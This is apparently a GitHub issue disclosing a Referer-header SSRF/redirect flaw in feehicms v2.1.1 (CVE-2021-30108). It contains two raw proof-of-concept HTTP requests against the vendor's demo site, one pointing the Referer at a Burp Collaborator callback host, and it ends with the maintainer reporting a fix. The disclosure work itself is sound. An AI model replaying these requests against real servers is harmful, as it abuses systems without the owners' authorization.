SSRF vulnerability in feehicms v2.1.1

[Jason1314Zhang]

This is a Server-side request forgery vulnerability. We can change HTTP Referer Header to any url, then the server will request it. Details are as follows:

We need to send two requests

1. First register an account normally, here my account is test123, and the password is 123456

2. Log out of our account and log in again from the picture below

• 

use burpsuite change the http Referer Header,

• 

The first POC request is as follows

GET http://demo.cms.feehi.com/index.php?r=site%2Flogin HTTP/1.1
Host: demo.cms.feehi.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://8oxj66ons65elf2qv4rtf9p7aygo4d.burpcollaborator.net
Cookie: PHPSESSID=qonm8i5t18ib80j9pd7dmashk5; _csrf=cda18c17fe47abcbb2087ab119b1eecbd6843d44869353569e637a9201e1d72ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-3hQu00puXWdYFwJBISJmdCQV3JNONUO%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1617248220; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1617254900; bdshare_firstime=1617249066528; Hm_lvt_949aa9449254cd665295a150d530d9c1=1617249086; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1617249086; BACKEND_FEEHICMS=s3gphj1i4fo2u6dq1kv127m711; _csrf_backend=b863ca10b196c0aa2b854de0b913dde6dee9e85eca6df36b82d4d93fdb8b944da%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22495TiL3mL5dkENl35cJv4JigTuVswDiS%22%3B%7D
Upgrade-Insecure-Requests: 1

3. Login with our account and password

• 

use burpsuite , We don't modify anything

The second POC request is as follows

POST http://demo.cms.feehi.com/index.php?r=site%2Flogin HTTP/1.1
Host: demo.cms.feehi.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
Origin: http://demo.cms.feehi.com
Connection: close
Referer: http://demo.cms.feehi.com/index.php?r=site%2Flogin
Cookie: PHPSESSID=qonm8i5t18ib80j9pd7dmashk5; _csrf=cda18c17fe47abcbb2087ab119b1eecbd6843d44869353569e637a9201e1d72ba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22-3hQu00puXWdYFwJBISJmdCQV3JNONUO%22%3B%7D; Hm_lvt_faacd6412dc0ae220c883834f9c896eb=1617248220; Hm_lpvt_faacd6412dc0ae220c883834f9c896eb=1617254930; bdshare_firstime=1617249066528; Hm_lvt_949aa9449254cd665295a150d530d9c1=1617249086; Hm_lpvt_949aa9449254cd665295a150d530d9c1=1617249086; BACKEND_FEEHICMS=s3gphj1i4fo2u6dq1kv127m711; _csrf_backend=b863ca10b196c0aa2b854de0b913dde6dee9e85eca6df36b82d4d93fdb8b944da%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22495TiL3mL5dkENl35cJv4JigTuVswDiS%22%3B%7D
Upgrade-Insecure-Requests: 1

_csrf=kgPC6DtyS_hxWBm1BRhqtuxuO1lKLvtXbXluSk4cmje_MKq5TkJ7iAQATtFcXh38ridoEydKuAY7SiQEAVLPeA%3D%3D&LoginForm%5Busername%5D=test123&LoginForm%5Bpassword%5D=123456&LoginForm%5BrememberMe%5D=0&LoginForm%5BrememberMe%5D=1&login-button=

Then we found that the response packet of the second request contained a 302 jump, The jump url is the Referrer header of our first request packet

The response of the second request packet is as follows

• 

4. Vulnerability proof

• 
• 

5. how to fix

https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html

[OS-WS]

Hi,
This issue was assigned with CVE-2021-30108.
Was it ever addressed / fixed?

[Jason1314Zhang]

Hi,
This issue was assigned with CVE-2021-30108.
Was it ever addressed / fixed?

It hasn't been fixed yet

[liufee]

@Jason1314Zhang d45cb9c
Hi, thanks for your feedback.
The secruity problem has been fixed.